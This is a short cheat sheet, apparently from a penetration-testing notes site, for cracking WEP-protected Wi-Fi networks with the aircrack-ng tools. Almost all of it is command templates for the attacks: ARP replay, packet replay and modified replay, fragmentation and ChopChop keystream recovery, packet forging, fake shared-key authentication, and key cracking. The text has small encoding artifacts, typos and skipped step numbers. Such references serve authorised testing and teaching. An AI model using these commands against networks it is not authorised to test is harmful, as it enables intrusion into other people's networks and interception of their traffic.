WEP
Crack WEP with a client and open system authenticationâ
You must listen on the right channel filtering by BSSID and be associated with the targeted AP.
aireplay-ng -3 -b <ap_mac> -h <chipset_mac> <wlan1mon>
Deauthenticate a supplicant can generate an ARP packet.
Cracking WEP
aircrack-ng -z <out.cap>
Crack WEP via a clientâ
You must listen on the right channel filtering by BSSID and be associated with the targeted AP.
Packet replayâ
ToDS set to 1
aireplay-ng -2 -b <ap_mac> -d FF:FF:FF:FF:FF:FF -t 1 <wlan1mon0>
Looking for ARP packets sent by the AP
aireplay-ng -2 -b <ap_mac> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 <wlan1mon0>
Modified packet replayâ
Thanks to the Frame Control Field, the packet seems to come from a client.
aireplay-ng -2 -b <ap_mac> -d FF:FF:FF:FF:FF:FF -t 1 -p 0841 <wlan1mon0>
Crack WEP clientless and open system authenticationâ
You must listen on the right channel filtering by BSSID and be associated with the targeted AP.
1. Generate PRGA XORâ
Fragmentation attack
aireplay-ng -5 -b <ap_mac> -h <chipset_mac> <wlan1mon>
ChopChop attack
aireplay-ng -4 -b <ap_mac> -h <chipset_mac> <wlan1mon>
2. Forge an injectable packetâ
Try to guess a valid source IP and an unsued destination IP.
You can use the broadcast address for source and destination.
packetforge-ng -0 -a <ap_mac> -h <chipset_mac> -l <source_ip> -k <dest_ip> -y <prga.xor> -w <inject.cap>
3. Inject forged packet and crackâ
aireplay-ng -2 -r <inject.cap> <wlan1mon>
aicrack-ng <airodump.cap>
Crack WEP with client and SKAâ
Option 1 - Standard attackâ
3.Deauthenticate a supplicant should generate a keystream (PRGA XOR).
Once the PRGA XOR is generated, use it to run a fake authentication
aireplay-ng -1 6000 -e <essid> -y <prga_xor> -a <ap_mac> -h <chipset_mac> <wlan1mon>
Once authenticated, it is a basic WEP crack (ARP request/reply).
Option 2 - Broken SKAâ
You will still generate a broken SKA, but the ARP replay attack should work anyway.
aireplay-ng -3 -b <ap_mac> -h <supplicant_mac> <wlan1mon>